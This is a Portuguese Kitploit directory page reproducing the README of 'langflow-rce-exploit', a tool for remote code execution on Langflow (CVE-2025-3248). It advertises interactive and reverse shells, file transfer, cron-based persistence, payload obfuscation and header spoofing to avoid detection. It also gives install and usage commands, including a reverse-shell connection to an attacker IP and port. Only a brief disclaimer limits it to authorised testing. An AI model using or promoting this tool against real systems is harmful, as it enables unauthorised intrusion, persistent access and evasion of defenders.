Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
langflow-rce-exploit — Exploit de Execução Remota de Código para Langflow (CVE-2025-3248) - [ By S4Tech ] | Kitploit
Ferramentas/GitHubGitHub/0-d3y/langflow-rce-exploit
Escalada de PrivilégiosMecanismos de PersistênciaAnálise de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingFerramenta de Acesso RemotoDesenvolvimento de Payloads
71há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHub
0-d3y/langflow-rce-exploit

langflow-rce-exploit

Exploit de Execução Remota de Código para Langflow (CVE-2025-3248) - [ By S4Tech ]

Ver Repositório

Exploração RCE no Langflow (CVE-2025-3248)

Python Version License Platform

Exploração de Execução Remota de Código para Langflow (CVE-2025-3248)

Funcionalidades

  • Detecção automática de vulnerabilidades
  • Múltiplos modos de exploração:
    • Shell interativo
    • Execução de comando único
    • Conexão reverse shell
  • Capacidade de upload de arquivos
  • Interface colorida
  • Múltiplos métodos de reverse shell
  • Persistência do histórico de comandos

📌 Changelog (v2.0)

✨ Novas funcionalidades:

  • Sistema avançado de payload com 5 métodos de execução
  • Upload/download de arquivos com codificação Base64
  • Persistência via cron jobs (comando persist)
  • Melhorias no shell interativo:
    • upload caminho_local caminho_remoto
    • download caminho_remoto caminho_local
    • Comando clear para terminal

🛡️ Melhorias de segurança:

  • Ofuscação automática de payload (Base64 + variantes aleatórias)
  • Rotação de cabeçalhos por requisição:
    • User-Agent aleatório
    • IPs falsificados no X-Forwarded-For
  • Bypass HTTPS (suporte a certificados autoassinados)
  • Sem redirecionamentos para evitar detecção

⚡ Melhorias técnicas:

  • Verificação de vulnerabilidade em múltiplos estágios
  • Tratamento aprimorado de erros para conexões instáveis
  • Registro completo de sessão em exploit_log.txt
  • Persistência do histórico de comandos (.langflow_shell_history)

📊 Comparação de versões:

🐛 Correções de bugs:

  • Corrigidos problemas de conexão HTTPS
  • Melhorado o tratamento de caracteres especiais em comandos
  • Estabilizada a confiabilidade do reverse shell

Requisitos

  • Python 3.6 ou superior
  • Bibliotecas necessárias:
    • requests
    • colorama
    • readline

Instalação

root@kitploit:~
git clone https://github.com/0-d3y/langflow-rce-exploit.git
cd langflow-rce-exploit
pip install -r requirements.txt

Uso

root@kitploit:~
python exploit.py <URL> [opções]

Opções disponíveis:

Exemplos:

  1. Verificar vulnerabilidade:
root@kitploit:~
python exploit.py http://alvo.com
  1. Iniciar shell interativo:
root@kitploit:~
python exploit.py http://alvo.com --shell
  1. Executar comando único:
root@kitploit:~
python exploit.py http://alvo.com --command "whoami"
  1. Iniciar reverse shell:
root@kitploit:~
python exploit.py http://alvo.com --reverse 192.168.1.100 4444

Capturas de tela

Image.png)

Aviso

âڑ ï¸ڈ Esta ferramenta é apenas para fins educacionais e testes autorizados.
âڑ ï¸ڈ O uso não autorizado contra sistemas que você não possui ou não tem permissão para testar é ilegal.

Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para mais detalhes.

Autor

  • Mr.SaMi Twitter Instagram

Contribuições

Pull requests são bem-vindos. Para mudanças significativas, por favor abra uma issue primeiro para discutir o que você gostaria de alterar.

Baixar ferramenta
Recursov1.0v2.0
Métodos de Payload15
Transferência de Arquivos❌ Não suportado✅ Suportado
Persistência❌✅
Nível de FurtividadeBásicoAvançado
Registro de Sessão❌✅
OpçãoDescrição
--shellIniciar shell interativo
--reverse IP PORTAIniciar reverse shell para IP:PORTA
--command CMDExecutar comando único
--verboseAtivar saída verbose
--timeout SEGDefinir timeout da requisição (padrão: 10s)